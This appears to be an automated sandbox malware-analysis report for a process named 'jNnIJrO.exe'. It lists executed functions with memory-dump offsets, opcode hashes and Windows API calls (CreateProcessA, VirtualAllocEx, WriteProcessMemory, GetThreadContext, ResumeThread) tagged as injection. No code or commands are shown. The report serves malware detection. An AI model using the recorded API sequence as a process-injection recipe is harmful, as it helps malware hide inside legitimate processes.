                                                          Function 0530ACF8, Relevance: .3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.827215001.0000000005300000.00000040.00000010.sdmp, Offset: 05300000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5b48576dc1ec0ad560bac1e3a3fcbc7202ee9122bf0b9f440fd941dd16e915f
                                                          • Instruction ID: 2899511f53865ec88638f6f79fd5eeeeb2b1c5781b73edeb42ab592249f9ced3
                                                          • Opcode Fuzzy Hash: d5b48576dc1ec0ad560bac1e3a3fcbc7202ee9122bf0b9f440fd941dd16e915f
                                                          • Instruction Fuzzy Hash: 09A17E36E0031ACFCF05DFA5D8645EEBBB2FF84301B15856AE805AB261DB71A956CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: jNnIJrO.exe PID: 5952 Parent PID: 3352 jNnIJrO.exeCOMMON

                                                          Executed Functions

                                                          Function 06F98328, Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e97062a6cf24492909d08301d9b14bb4b4077954e92e2e7a0c14bf1a916296a
                                                          • Instruction ID: 089f95dab469843e27653e07e7c33f7913892763d0031963a66b21138d84bea0
                                                          • Opcode Fuzzy Hash: 9e97062a6cf24492909d08301d9b14bb4b4077954e92e2e7a0c14bf1a916296a
                                                          • Instruction Fuzzy Hash: 09314D71D04219CFEF68CF66C845BE9B7B6BB89300F0480EAD51CA7240EB705A84CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96F60, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F97196
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 4cd2cf17b45dfa958dd908e2f2286edeb6723ac4fdb6c603ebefa9e4d6d17430
                                                          • Instruction ID: 13b289f35da7cf0809730a42f3fe2286e8b55901f61b7b9988d3f45b5deca253
                                                          • Opcode Fuzzy Hash: 4cd2cf17b45dfa958dd908e2f2286edeb6723ac4fdb6c603ebefa9e4d6d17430
                                                          • Instruction Fuzzy Hash: A4914871D10319CFEF64DFA9C8407EEBBB2BB48304F148569E808A7290DB759985CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 011C5375, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 011C5431
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 86fb002e5ea1d883286daa25af4abad3d0cf0130843096c27d6d7ff66ed03ed1
                                                          • Instruction ID: 714d530157f4480ec1224db98a941db081fc050ec86c2bedd8b1ca1caacccf48
                                                          • Opcode Fuzzy Hash: 86fb002e5ea1d883286daa25af4abad3d0cf0130843096c27d6d7ff66ed03ed1
                                                          • Instruction Fuzzy Hash: 1D412371D00228CBDB24DFA9C9847CDFBF6BF49708F20806AD408AB211DB75694ACF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 011C3E2C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 011C5431
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: ee2cd695266e39ae64a7f78c07ae468eb40e590915c098d1fcf7f670bd659ccc
                                                          • Instruction ID: 19593709069d76a7ec3836a97cb1d8e70cbe010a73eae0aac741eeb131535d99
                                                          • Opcode Fuzzy Hash: ee2cd695266e39ae64a7f78c07ae468eb40e590915c098d1fcf7f670bd659ccc
                                                          • Instruction Fuzzy Hash: 27411370D00618CBDB28CFA9C9847CDFBF6BF59708F208469D408AB251D7746946CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96CD8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F96D68
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: ba52b87cf18453223ede0cdc5178a32d3b35e33e187599f49fb298fbe8431e3a
                                                          • Instruction ID: eb4cc8cf3f1a5815c1f53d9985ec5dff33152a350d6367881f58170f776b7ae3
                                                          • Opcode Fuzzy Hash: ba52b87cf18453223ede0cdc5178a32d3b35e33e187599f49fb298fbe8431e3a
                                                          • Instruction Fuzzy Hash: FC2102B19002599FDF10CFA9C984BDEBBF5FB48214F54882AE918A7240D7789954CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96DC8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96E48
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: a9001f4d10229ef29242835f66a9464518f264a5d792f6ac046810071b2cdf2c
                                                          • Instruction ID: 0c122a8950c5ce93b4a1b7f0922820804dc93fef8a64528a817ba78d39685c34
                                                          • Opcode Fuzzy Hash: a9001f4d10229ef29242835f66a9464518f264a5d792f6ac046810071b2cdf2c
                                                          • Instruction Fuzzy Hash: CE2119B19003599FDF10DFA9C8847DEBBF5FF48314F548429E518A7240C7359554DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96B40, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadContext.KERNELBASE(?,00000000), ref: 06F96BBE
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 7d3cb887b4a1c3a909769c99f3d0b04dc2afdb7769e02985a8a877d8497d0ee5
                                                          • Instruction ID: f3e415c4150a52591efb9d872442f6e359b0f032c020a580fea391d1418bd55d
                                                          • Opcode Fuzzy Hash: 7d3cb887b4a1c3a909769c99f3d0b04dc2afdb7769e02985a8a877d8497d0ee5
                                                          • Instruction Fuzzy Hash: 1A211A71D003098FDB50DFAAC4847EEBBF4EF48354F148429D459A7240DB789949CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 011CD1E8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CE0E9,00000800,00000000,00000000), ref: 011CE2FA
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 461874d5cf5ffce506843a7b35a95b6aa67d0a7ac25918d9f3be2679cad58adb
                                                          • Instruction ID: ce436485a0a65d93322ea34d146d409c0902bd671a0f56b5786218b8dc586def
                                                          • Opcode Fuzzy Hash: 461874d5cf5ffce506843a7b35a95b6aa67d0a7ac25918d9f3be2679cad58adb
                                                          • Instruction Fuzzy Hash: 351103B29002488FDB14CF9AC444BDEFBF9EB58714F14842ED915A7200C379A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96C18, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F96C86
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: fca0940da39121a73ad066907b2385b9e6d420f78fd889d18b01fcad01cd184a
                                                          • Instruction ID: 60291bd47000278ba4ffbb74ff842badd02a46297b650f8b5e330f780f1ccd9c
                                                          • Opcode Fuzzy Hash: fca0940da39121a73ad066907b2385b9e6d420f78fd889d18b01fcad01cd184a
                                                          • Instruction Fuzzy Hash: C21134729002489FDF10DFAAC844BDFBBF9EF48324F148829E919A7250C775A954CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F96A90, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: cc703096ef4ea25cb2f64435fed119be32b0a1b7fcbf622afc92e9527a823c55
                                                          • Instruction ID: d3ed3da860dbac18169589c56e3cf3f84f1ede657bac531c6db5fe616408822e
                                                          • Opcode Fuzzy Hash: cc703096ef4ea25cb2f64435fed119be32b0a1b7fcbf622afc92e9527a823c55
                                                          • Instruction Fuzzy Hash: 0E1106B1D003588BDF10DFAAC4447DEFBF9EB88228F148829D419A7340DB79A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 011CE008, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 011CE06E
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419225641.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: dfb87d641e2ad28f09731804a6951765efa0598e260ef1ea7380f622ef4f0e5e
                                                          • Instruction ID: f48ead6f128de5982fcde54b48cb9d62192ddf4b2a85b8647249734d988eec72
                                                          • Opcode Fuzzy Hash: dfb87d641e2ad28f09731804a6951765efa0598e260ef1ea7380f622ef4f0e5e
                                                          • Instruction Fuzzy Hash: F11110B1D002498FDB24CF9AC444BDEFBF8AB88724F14852AD829A7200C379A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06F997C8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,?,?,?), ref: 06F99825
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.425199867.0000000006F90000.00000040.00000001.sdmp, Offset: 06F90000, based on PE: false
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 2a603083a9cdb18c2ed32f4613aa3c769394bf608f551152e3bdbb679f28bc47
                                                          • Instruction ID: 02412cd2e5584ad5ee983519db2bdf26d21d4b6e874b721844f76318e2c50eb8
                                                          • Opcode Fuzzy Hash: 2a603083a9cdb18c2ed32f4613aa3c769394bf608f551152e3bdbb679f28bc47
                                                          • Instruction Fuzzy Hash: BE11E2B5900349DFDB10CF9AD889BDEBBF8FB58324F14841AE954A7600C374A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0111D1D4, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419024861.000000000111D000.00000040.00000001.sdmp, Offset: 0111D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25884720a3fcd75db14e739bab13fa78f69b1f2f8e675c3a0ecb346e4c38ebbb
                                                          • Instruction ID: 37c8b5a518c549f9460e8b6be5582d93169e6e1c375db1d8113a7b04ac372db4
                                                          • Opcode Fuzzy Hash: 25884720a3fcd75db14e739bab13fa78f69b1f2f8e675c3a0ecb346e4c38ebbb
                                                          • Instruction Fuzzy Hash: 6421D371504240DFDF09CF94E5C8B56FBA5FB84224F24CAB9E8094B24AC736D846CA62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0111D0EC, Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419024861.000000000111D000.00000040.00000001.sdmp, Offset: 0111D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5f7f4143f287d9afb939e95f57b1e2f2f28db7f4fb27253f280ee7ca473c10bd
                                                          • Instruction ID: c3a6c68370aceb852133b3ce4062fb46b173703b30ed9dd414e00b378ead295d
                                                          • Opcode Fuzzy Hash: 5f7f4143f287d9afb939e95f57b1e2f2f28db7f4fb27253f280ee7ca473c10bd
                                                          • Instruction Fuzzy Hash: 9821F575504240EFDF09DF94E9C8B16FBA5FB44314F24C979D8094B34AC776D846CAA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0111D0E7, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419024861.000000000111D000.00000040.00000001.sdmp, Offset: 0111D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction ID: ccf52c5a53258284eeb72ff49b261d1abc60cac52f943935324ae0b5290b59f2
                                                          • Opcode Fuzzy Hash: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction Fuzzy Hash: 61118E75504280DFDB06CF54D9C8B15FBB1FB44214F24C6A9D8494B65AC33AD44ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0111D1CF, Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.419024861.000000000111D000.00000040.00000001.sdmp, Offset: 0111D000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction ID: 2966abeba3e253d4a79ad6a747ef19e2d627987fceb5238218be45e5a6bbf6a1
                                                          • Opcode Fuzzy Hash: 32bacf70451705ea961c6d5f0b109703adc9f0fbd3f1c5808569d94555b5c9bf
                                                          • Instruction Fuzzy Hash: 5611BB75504280DFCF06CF54D5C8B55FBB1FB84224F28C6AAD8494B69AC33AD44ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions